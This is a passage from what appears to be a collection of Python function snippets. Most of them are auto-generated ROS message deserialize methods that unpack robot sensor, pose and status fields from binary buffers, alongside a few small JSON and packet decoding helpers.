end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 12\n (_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8,) = _struct_12B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is 
None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts,) = _struct_9B.unpack(str[start:end])\n self.dvl_sts = bool(self.dvl_sts)\n self.svs_sts = bool(self.svs_sts)\n self.fog_sts = bool(self.fog_sts)\n self.nav_sts = bool(self.nav_sts)\n self.bat_sts = bool(self.bat_sts)\n self.t_sts = bool(self.t_sts)\n self.h_sts = bool(self.h_sts)\n self.p_sts = bool(self.p_sts)\n self.water_sts = bool(self.water_sts)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.pose is None:\n self.pose = geometry_msgs.msg.PoseWithCovariance()\n end = 0\n _x = self\n start = end\n end += 72\n (_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w,) = _get_struct_Q8d().unpack(str[start:end])\n start = end\n end += 288\n self.pose.covariance = _get_struct_36d().unpack(str[start:end])\n _x = self\n start = end\n end += 40\n (_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h,) = _get_struct_5d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.modality = str[start:end].decode('utf-8')\n else:\n self.modality = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.embed_vector = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 24\n (_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered,) = _struct_3B4IH3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.model_aligned is None:\n self.model_aligned = articulation_msgs.msg.ModelMsg()\n if self.data_aligned is None:\n self.data_aligned = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.name = str[start:end].decode('utf-8')\n else:\n self.model_aligned.name = str[start:end]\n start = end\n end += 4\n 
(length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v71 = val1.position\n _x = _v71\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v72 = val1.orientation\n _x = _v72\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v73 = val1.stamp\n _x = _v73\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v74 = val1.position\n _x = _v74\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v75 = val1.orientation\n _x = _v75\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v76 = val1.position\n _x = _v76\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v77 = val1.orientation\n _x = _v77\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.model_aligned.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.name = str[start:end].decode('utf-8')\n else:\n self.data_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v78 = val1.position\n _x = _v78\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v79 = val1.orientation\n _x = _v79\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v80 = val1.stamp\n _x = _v80\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v81 = val1.position\n _x = _v81\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = 
_struct_3d.unpack(str[start:end])\n _v82 = val1.orientation\n _x = _v82\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v83 = val1.position\n _x = _v83\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v84 = val1.orientation\n _x = _v84\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.data_aligned.track.channels.append(val1)\n start = end\n end += 72\n self.R = _struct_9d.unpack(str[start:end])\n start = end\n end += 24\n self.T = _struct_3d.unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.dist_rot, _x.dist_trans,) = _struct_df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 32\n (_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left,) = _struct_didid.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_left_sensor = str[start:end]\n start = end\n end += 8\n (self.turn_right,) = _struct_d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_right_sensor = str[start:end]\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def __parse_message_as(msg_type: type, msg_str: str) -> Any:\n # parse the message\n msg_dict = json.loads(msg_str)\n\n # the type specified in the message needs to match\n # the type we are parsing as\n assert msg_dict[MSG_TYPE_NAME] == msg_type.__name__, \\\n f\"Message type did not match the parsing type,\" \\\n f\"parsing the message as type {msg_type.__name__},\" \\\n f\"but get a message of type {msg_dict[MSG_TYPE_NAME]}\"\n\n # remove the message type information, and create the object\n del msg_dict[MSG_TYPE_NAME]\n return msg_type(**msg_dict)", "def from_msg(cls, msg):\n if cls._debug:\n log.debug('msg=%s', msg)\n key, seq_s, uuid, prop_s, body = msg\n key = key if key else None\n seq = struct.unpack('!q', seq_s)[0]\n body = body if body else None\n if body:\n body = pipeline.load(body)\n #body = json.loads(body_s)\n #prop = json.loads(prop_s)\n prop = pipeline.load(prop_s)\n return cls(seq, uuid=uuid, key=key, 
properties=prop, body=body)", "def unpack(self, raw_message):\n return self._msg_struct.unpack(raw_message)", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno,) = _struct_14id2i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.canmsg = str[start:end].decode('utf-8')\n else:\n self.canmsg = str[start:end]\n _x = self\n start = end\n end += 30\n (_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate,) = _get_struct_Bf2B2f2B2fBf().unpack(str[start:end])\n self.track_group_changed = bool(self.track_group_changed)\n self.track_bridge_object = bool(self.track_bridge_object)\n self.track_rolling_count = bool(self.track_rolling_count)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 1\n (self.type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model = str[start:end].decode('utf-8')\n else:\n self.model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.head_version = str[start:end].decode('utf-8')\n else:\n self.head_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.body_version = str[start:end].decode('utf-8')\n else:\n self.body_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.arm_version = str[start:end].decode('utf-8')\n else:\n self.arm_version = str[start:end]\n _x = self\n start = end\n end += 14\n (_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands,) = _struct_2B3i.unpack(str[start:end])\n self.has_laser = bool(self.has_laser)\n self.has_extended_arms = bool(self.has_extended_arms)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def decode(cls, buffer):\n\n if len(buffer) < struct.calcsize(b\"<i\"):\n raise IncompleteMessageError\n size = struct.unpack(b\"<i\", buffer[:4])[0]\n if len(buffer) - struct.calcsize(b\"<i\") < size:\n raise IncompleteMessageError\n packet = buffer[:size + 4]\n buffer = buffer[size + 4:]\n id = struct.unpack(b\"<i\", packet[4:8])[0]\n type = struct.unpack(b\"<i\", packet[8:12])[0]\n body = 
packet[12:][:-2].decode(\"ascii\")\n return cls(id, type, body), buffer", "def unpack(self, s):\n\n raise NotImplementedError()", "def deserialize(self, str):\n try:\n if self.line is None:\n self.line = None\n if self.circle is None:\n self.circle = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.line = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Line()\n _x = val1\n start = end\n end += 20\n (_x.x1, _x.y1, _x.x2, _x.y2, _x.color,) = _get_struct_4if().unpack(str[start:end])\n self.line.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.circle = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Circle()\n _x = val1\n start = end\n end += 16\n (_x.x, _x.y, _x.radius, _x.color,) = _get_struct_3if().unpack(str[start:end])\n self.circle.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tsp_turtles = str[start:end].decode('utf-8')\n else:\n self.tsp_turtles = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.conveyor_turtle = str[start:end].decode('utf-8')\n else:\n self.conveyor_turtle = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.catch_turtle = str[start:end].decode('utf-8')\n else:\n self.catch_turtle = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.RPY is None:\n self.RPY = geometry_msgs.msg.Vector3()\n if self.LLA is None:\n self.LLA = geometry_msgs.msg.Vector3()\n if self.NedVel is None:\n self.NedVel = geometry_msgs.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 116\n (_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount,) = _get_struct_d2H9d5fdI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pointA is None:\n self.pointA = nubot_common.msg.Point2d()\n if self.pointB is None:\n self.pointB = nubot_common.msg.Point2d()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n 
(length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce,) = _get_struct_3B4f2h3B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.x is None:\n self.x = geometry_msgs.msg.PoseStamped()\n if self.x_desi is None:\n self.x_desi = geometry_msgs.msg.PoseStamped()\n if self.x_desi_filtered is None:\n self.x_desi_filtered = geometry_msgs.msg.PoseStamped()\n if self.x_err is None:\n self.x_err = geometry_msgs.msg.Twist()\n if self.xd is None:\n self.xd = geometry_msgs.msg.Twist()\n if self.xd_desi is None:\n self.xd_desi = geometry_msgs.msg.Twist()\n if self.F is None:\n self.F = geometry_msgs.msg.Wrench()\n if self.J is None:\n self.J = std_msgs.msg.Float64MultiArray()\n if self.N is None:\n self.N = std_msgs.msg.Float64MultiArray()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi_filtered.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi_filtered.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 248\n (_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, 
_x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z,) = _get_struct_31d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_pose = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_posture = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.J.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.J.layout.dim.append(val1)\n start = end\n end += 4\n (self.J.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.J.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.N.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.N.layout.dim.append(val1)\n start = end\n end += 4\n (self.N.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.N.data = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.position is None:\n self.position = pcl_segment.msg.positionRPY()\n end = 0\n _x = self\n start = end\n end += 57\n (_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known,) = _get_struct_6d2IB().unpack(str[start:end])\n self.is_Known = bool(self.is_Known)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n return self\n except struct.error as e:\n 
raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.actors is None:\n self.actors = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actors = []\n for i in range(0, length):\n val1 = nesfr3_msgs.msg.Actor()\n _v9 = val1.header\n start = end\n end += 4\n (_v9.seq,) = _get_struct_I().unpack(str[start:end])\n _v10 = _v9.stamp\n _x = _v10\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = 